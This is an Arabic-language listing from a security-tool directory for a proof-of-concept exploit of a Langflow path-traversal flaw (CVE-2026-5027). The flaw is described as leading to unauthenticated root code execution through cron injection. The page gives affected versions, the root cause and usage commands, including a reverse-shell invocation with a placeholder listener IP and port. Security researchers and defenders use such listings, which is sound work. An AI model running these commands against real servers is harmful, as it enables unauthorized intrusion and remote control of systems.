Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5027 — إثبات مفهوم لاستغلال CVE-2026-5027، وهي ثغرة اجتياز المسار في Langflow تؤدي إلى تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه عبر حقن مهام cron. | Kitploit
أدوات/GitHubGitHub/yahiahamza/cve-2026-5027
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubyahiahamza/cve-2026-5027

CVE-2026-5027

إثبات مفهوم لاستغلال CVE-2026-5027، وهي ثغرة اجتياز المسار في Langflow تؤدي إلى تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه عبر حقن مهام cron.

عرض المستودع
42منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-5027 - ثغرة اجتياز المسار في Langflow تؤدي إلى تنفيذ الأوامر عن بُعد

الوصف

لا تقوم إصدارات Langflow حتى الإصدار 1.8.4 وما يليه بتعقيم معامل filename في نقطة النهاية POST /api/v2/files. يمكن للمهاجم استخدام تسلسلات اجتياز المسار (../) لكتابة ملفات إلى مواقع عشوائية على نظام الملفات. وعند دمج ذلك مع إعداد تسجيل الدخول التلقائي الافتراضي في Langflow، يمكن استغلال هذه الثغرة دون أي مصادقة، مما يؤدي إلى تنفيذ الأوامر عن بُعد بصلاحيات الجذر عبر حقن مهام cron.

الإصدارات المتأثرة

  • قابلة للاستغلال: Langflow <= 1.8.4
  • تم الإصلاح: لا يوجد تصحيح متاح وقت كتابة هذا التقرير
  • الإعداد الافتراضي: تسجيل الدخول التلقائي مفعّل (استغلال بدون مصادقة)
  • النشرة الأمنية: Tenable TRA-2026-26

الاستخدام

root@kitploit:~
# إثبات المفهوم (يكتب ملف اختبار إلى /tmp/)
python3 exploit.py -t http://target:7860

# مع بيانات الاعتماد (إذا تم تعطيل تسجيل الدخول التلقائي)
python3 exploit.py -t http://target:7860 -u admin -p password

# قشرة عكسية عبر مهمة cron
python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444

مثال على المخرجات

CVE-2026-5027 Exploit

CVE-2026-5027 Reverse Shell

السبب الجذري

تقوم الدالة upload_user_file() في src/backend/base/langflow/api/v2/files.py بتمرير file.filename مباشرة إلى خدمة التخزين دون تعقيم. وتقوم الدالة LocalStorageService.save_file() ببناء المسار باستخدام folder_path / file_name، وهو ما لا يمنع اجتياز الدليل.

المراجع

  • نشرة Tenable الأمنية TRA-2026-26
  • Langflow على GitHub
  • CVE-2026-5027: اجتياز المسار في Langflow إلى تنفيذ الأوامر عن بُعد - تحليل تقني كامل

إخلاء المسؤولية

تُقدَّم هذه الأداة لأغراض الاختبارات الأمنية المصرح بها والأغراض التعليمية فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

المؤلف

يحيى حمزة - https://yh.do

تنزيل الأداة